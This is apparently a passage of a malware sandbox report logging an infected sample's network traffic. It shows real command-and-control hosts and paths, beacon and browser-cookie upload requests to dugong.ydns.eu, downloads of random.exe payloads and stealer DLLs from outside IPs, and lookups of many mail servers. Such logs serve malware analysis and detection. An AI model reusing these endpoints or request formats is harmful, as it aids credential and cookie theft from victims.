                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJEHost: dugong.ydns.euContent-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 45 34 41 34 45 36 36 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 61 66 66 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="hwid"491E4A4E66092653764225------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build"traff1------DBAEGCGCGIEGDHIDHJJE--
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 32 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111200101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFIJKKEHJDHJKFIECAHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 2d 2d 0d 0a Data Ascii: ------BAAFIJKKEHJDHJKFIECAContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------BAAFIJKKEHJDHJKFIECAContent-Disposition: form-data; name="message"browsers------BAAFIJKKEHJDHJKFIECA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCHost: dugong.ydns.euContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 2d 2d 0d 0a Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="message"plugins------GDGHIDBKJEGIECBGIEHC--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"fplugins------HJJJECFIECBGDGCAAAEH--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: dugong.ydns.euContent-Length: 7091Connection: Keep-AliveCache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 32 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111210101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCGHDHIDHCBGCBGCAEHost: dugong.ydns.euContent-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 2d 2d 0d 0a Data Ascii: ------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HDHCGHDHIDHCBGCBGCAE--
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="file"------BFHDHJKKJDHJJJJKEGHI--
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 32 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111220101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 32 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111220101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCFHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 2d 2d 0d 0a Data Ascii: ------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="file"------HCFBKKEBKEBGIDHIEHCF--
                                                Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: unknownDNS traffic detected: query: out.surfersmap.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.glomedvn.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.students.bismarck.k67.il.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.pttbsa.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.mihanmil.ir replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bryonymaycakes.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.trtdkhom.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.lisar.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.n4point.onmicrosoft.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.devriesmoving.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: dawtastream.bet replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.feltrex.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.montague.co.nz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bos-carton.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.kjkjs.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jazzmedia-and-more.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.escuelagasparcabrales.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.omv.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.toiture-62.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.chat2play.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: myself.co.id replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.vinotekafany.cz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.celgene.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: stjosephwomen.on.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: gsaav.sacyl.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jenniferchon.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.pec.ordineavvocatinocerainferiore.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.r2k.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.heavenfighter.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.root-solutions.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.studentplus.kiev.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: vorsin.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: 6d8uq.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.gcareplan.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: fix.zp.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: gmbol.cem replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.pacificbaharibali.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.atc.torino.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.ssm.silesia.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.aluno.ceiparaty.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.maxwork.at replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: logyx.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.sahinkalip.com.tr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.timpress.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.moonstoneblue.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.uz86.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.erx.aph.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ambo.co.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.uka.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.mymelody.com.sg replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: out.gmila.con.vu replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.repon.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.austinoutdoor.com replaycode: Name error (3)
